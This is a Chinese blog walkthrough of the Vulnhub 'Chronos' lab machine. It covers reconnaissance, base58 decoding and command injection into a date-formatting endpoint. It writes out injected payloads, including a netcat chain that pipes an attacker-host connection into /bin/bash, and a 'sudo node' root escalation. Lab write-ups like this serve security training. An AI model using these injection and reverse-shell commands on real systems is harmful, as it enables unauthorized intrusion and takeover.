Vulnhub靶机随笔-Chronos

已于 2024-03-07 15:46:45 修改
阅读量923 收藏 17
点赞数 17
分类专栏: VulnHub 文章标签: linux web安全 网络安全 网络 服务器
于 2024-03-07 15:44:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_59005129/article/details/136535746
版权

Vulnhub靶机Chronos详解:

渗透机:Kali IP:192.168.1.105 靶机Chronos IP:未知

  1. 信息收集
    1. 扫描靶机存活性
  2. 扫描靶机开放服务端口及其版本信息
    2. 很常见的两个服务,一个ssh一个http,不过8000端口有一个Node,js搭建的网站,等到后续我再介绍,这里留个心眼
  3. 同时进行ssh弱口令爆破,访问80以及8000获取信息
    2. ssh弱口令失败
    4. 可以看到这有一串js,而且通过0x5bdf得知,这是进行过编码的,所以我们复制这一串js脚本,进行破解,这里从大佬得到一个网站解码CyberChef,非常好用
    6. 在output中,有一串东西很有意思
    8. 从中不难得知,chronos就是靶机的名字,local是本地的意思,后面的8000端口我们也在第一步中扫描出,所以我们可以将需要往/etc/hosts文件中添加正向解析,操作如下:
    11. 你会看到这多出一段时间,像不像date命令得出的结果
    12. 再看一下刚刚解码得出的
    13. date?format=4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL
  4. 命令执行漏洞
    1. 大胆猜测format后面这串进行过加密,且结果很有可能就是date的输出格式,解码走起,这里用到网站的magic解码,会自动识别哪种算法加密
    4. 走到这一步,我们不妨再大胆一点,date是系统命令,format后面是选项参数,那我们是不是可以利用burpsuit抓包进行命令执行漏洞?    
    5. 因为format后面是base58加密的,所以我们也需要进行编码才能执行漏洞
    6. 输入命令'+Today is %A, %B %d, %Y %H:%M:%S.' | ls -l
    8. 进行编码
    10. 抓包进行篡改
    12. 成功获取信息,既然可以进行命令注入,我们必须要尝试nc反弹shell
    13. 输入命令: '+Today is %A, %B %d, %Y %H:%M:%S.' | nc 攻击机IP 监听端口
    14. 进行编码:
    18. 这里显示错误,但是连接是OK的,这里就要用到一个独特方法:      nc串联
    19. 输入命令: '+Today is %A, %B %d, %Y %H:%M:%S.' | nc 192.168.1.105 4444 |/bin/bash | nc 192.168.1.105 5555
    20. 进行编码
    22. 开启监听
    2. 可以看到成功建立连接,并且有反馈,不过是在5555这个窗口中
  2. 提权
    1. 我们先看看有没有什么可用的信息,先进家目录
    4. 有一个user.txt,但是我们没有权限查看
    5. 在进行大量的信息搜集以后,我们还是回到最初的起点,去网站里翻阅一下
    8. 简单介绍一下Node.js
    9. Node.js项目遵循模块化的架构,当我们创建一个Node.js项目,意味着创建了一个模块,这个模块的描述文件,被称为package.json, 它包含了运行项目所需要的各种依赖、项目配置信息
    10. 所以我们去查看一下package.json
    12. Emmm,没什么用,就在一筹莫展之时,别忘了还有一个chronos-v2,而且还是root权限
    15. 继续查看package.json
    18. 终于找到一点有用的东西,有点文件上传的味了,而且这提示我们去看一下server.js文件,在大佬的文章中,我得知了express-fileupload漏洞利用脚本,并且利用前提parseNested是开启的,如下图片
    20. 攻击脚本如下:
    22. 在1的位置输入攻击机的IP地址,2的位置因为是本地上传所以用回环地址没什么问题,也可以解析到.
    23. 接着就是上传文件,可以将shell.py发布出去,也可以将脚本放进/var/www/html文件下,开启apache2服务,在靶机上获取并运行即可
  3. 运行脚本获取用户shell
    1. 先在攻击机上开启监听,端口为脚本里设置的,我这里5555冲突了,忘记了已经使用了,所以我在脚本中更改为9999
    4. 成功获取到用户imera的shell,终于可以看家目录底下的user.txt了
    6. 获取到第一个flag: byBjaHJvbm9zIHBlcm5hZWkgZmlsZSBtb3UK
  4. 继续提权
    1. 我们还要提权到root用户
    2. 这里使用的是sudo -l进行提权
    4. 我们可以利用node,node就是类似于java语言的开发环境,我们平常写的是python反弹shell,今天写一个java的反弹shell
    5. 命令: sudo node -e 'child_process.spawn("/bin/bash", {stdio: [0,1,2]})'
    8. 获取到第二个flag: YXBvcHNlIHNpb3BpIG1hemV1b3VtZSBvbmVpcmEK
    9. 这里就不解码了,因为解出来我也看不懂,感兴趣的自己琢磨琢磨吧
  5. Finish,题目解完了,你们的点赞是我更新的动力

不会PWN不改名
关注
专栏目录
VnlnHub CHRONOS 1
weixin_45682839的博客
09-03 580
VnlnHub CHRONOS 1靶场通关攻略记录,涉及知识包括:端口服务探测、解编码、命令注入、nc串联、linux本地提权、框架漏洞利用
vulnhub靶机实战--FunBox3:EASY
m0_64312309的博客
09-21 697
Vulnhub介绍: Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场,同时它还提供了 Docker 镜像,可以使用 Docker 直接启动靶场,大大简化了渗透测试人员在搭建各种漏洞靶场时的步骤
VulnHub靶场】——CHRONOS: 1
热门推荐
Demo不是emo的博客
12-31 1万+
24次系统性打靶第三次训练,每次打靶后都会分享靶场攻略和总结的知识点
vulnhub靶场-Chronos
qq_42947816的博客
05-10 919
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
VulnHub靶场-Chronos
热爱学习,喜欢折腾!
06-11 891
Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBoxBoot打开,从启动虚机到获取操作系统的root权限和查看flag。
Chronos靶机
qq_40646572的博客
05-24 391
信息搜集 使用nmap扫描获取网段信息。 获取到靶机的ip地址以及相应开放的服务端口。 web服务探测 打开靶机web服务,在网络连接中,发现一个域名解析失败。这个域名应该是靶机的8000端口的服务。 在/etc/hosts文件中添加域名解析。 域名解析成功。发现其中http://chronos.local:8000/date?请求时options请求方式,感觉可能会有点信息可以利用。 使用bp尝试更改下请求方式。 更改方式加上修改参数的值,发现存在一个经过编码的参数值。 发现只是base
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
vulnhub靶机BSides-Vancouver-2018-Workshop渗透笔记
liver100day的博客
05-15 520
渗透测试实战–BSides-Vancouver-2018-Workshop 靶机下载/安装 靶机下载地址:https://www.vulnhub.com/entry/brainpan-1,51/ 靶机IP地址:未知 kali渗透机地址:192.168.75.128 1.主机发现
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
靶机三:CHRONOS_ 1
travelnight的博客
05-05 382
靶机三:CHRONOS: 1
VulnHub-Chronos: 1
weixin_44249502的博客
08-25 348
本文介绍了VulnHub平台上的CHRONOS: 1虚拟靶场,旨在帮助网络安全爱好者提升技能。该靶场设计了多个真实场景,要求玩家使用渗透测试和漏洞利用技巧获取隐藏在系统中的flag。文章解释了靶场背景、玩法和优势,强调其为安全从业人员提供了实践经验,加强了防御和攻击能力。通过解决不同难度任务,参与者能够更好地应对不断出现的网络安全挑战。
Vulnhub:CHRONOS: 1
weixin_69670995的博客
06-15 585
在 /opt/chronos-v2/backend 下发现 express-fileupload,百度一下它的漏洞,找的了攻击代码。抓包发现有三个请求,最后一个显示了时间,将get传参进行解密,尝试了base64,结果失败,后来发现是base58解密。将下载的虚拟机导入Oracle VM VirtualBox中,网络设置仅主机模式,网卡使用和kali相同的网卡。发现是显示当前时间的命令,猜测是命令执行,尝试一下命令要用base58编码一下。发现22,80,8080端口,使用浏览器访问80端口。
打靶记录3——靶机Chronos
最新发布
Fab1an的博客
07-22 1087
按照惯例先进行了主机发现,端口扫描,应用发现在Web界面发现奇怪的域名,于是进行了域名的绑定,查看到页面当中的变化,于是通过页面源码的分析找出了这段JavaScript的脚本,从中发现了经过Base58编码的字符通过对这段字符的还原内容的分析,发现了命令注入的漏洞,进而通过Base58编码我们的注入命令对目标系统进行了一系列的命令注入的漏洞,进而利用这样的命令执行漏洞进而通过NC获得了一个反弹的shell,用NC串联的方式,结合管道来实现的。
Chronos靶机打靶过程(利用express-fileupload)
捣蛋鬼
03-27 3973
难度:中(构思巧妙) 目标:取得2个flag+root权限 涉及攻击方法: 端口扫描 WEB侦察 命令注入 数据编解码 搜索大法 框架漏洞利用 代码审计 NC串联 本地提权 0x01 sudo netdiscover -r 10.0.2.0/16 #主机发现 sudo nmap -p- 10.0.2.6 #扫描全端口 sudo nmap -p22,80,8000 -sV 10.0.2.6 #扫描端口所开启的服务 0x02 访问80端口并查看页面源码 在script标签里发现一段脚本 v
VulnhubChronos:1 靶机实验
weixin_64112307的博客
06-30 1089
EJS-RCE
Vulnhub靶机--Chronos
Tauil的博客
08-05 648
登录靶机页面,查看网络数据包,发现有两个数据包被拒绝了,查看到其IP显示为chronos.local,其回显仍然是靶机IP,所以需要修改 dns 指向,在本地 hosts 文件中将该网站进行自定义转向,输入命令。尝试将该参数进行解码,发现是base58编码,并且该语句后面衔接其他命令是可执行的,那么要是该网页输入参数没有进行替换或者过滤的话,便可以执行任意语句。发现该靶机还开了另外一个网络服务,在本地8080端口,而外网无法访问到,我们先找到该网络服务所在文件,发现在另一个版本的chronos-v2中。..
Chronos靶机打靶过程与思路
qq_52610024的博客
04-06 3425
1.常规主机侦探,sudonetdiscover-r10.0.2.0/162.常规端口和服务侦探3.cyberchet解码器,针对js代码4.发现一个本地域名解析地址,修改etc下的hosts文件对应地址解析5.bp抓包后在cyberchef平台上解码发现为base58编码,是一串时间的函数执行,所以考虑使用命令执行6.编码后提交nc串联攻击获得反弹shell,开始代码审计,最后发现node.js下的express-fileupload模块。...
靶机渗透练习61-Chronos
hirak0的博客
04-20 1875
靶机描述 靶机地址:https://www.vulnhub.com/entry/chronos-1,735/ Description Difficulty : medium This works better with VirtualBox rather than VMware 一、搭建靶机环境 攻击机Kali: IP地址:192.168.9.7 靶机: IP地址:192.168.9.58 注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式) 该靶机环境搭
chronos靶机 vmware
09-11
根据引用和引用,Chronos靶机是一个时间控制插件,它是一个免费的资源,作者已经不再维护并下架了。根据引用中的提到,有人尝试将VirtualBox的机器转换为VMware的机器来在VMware上打开Chronos靶机。根据引用,下载下来的是一个虚拟机.ova压缩文件,并提示这是VirtualBox虚拟机而非VMware虚拟机。因此,尝试使用VMware虚拟机打开Chronos靶机时会报错。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值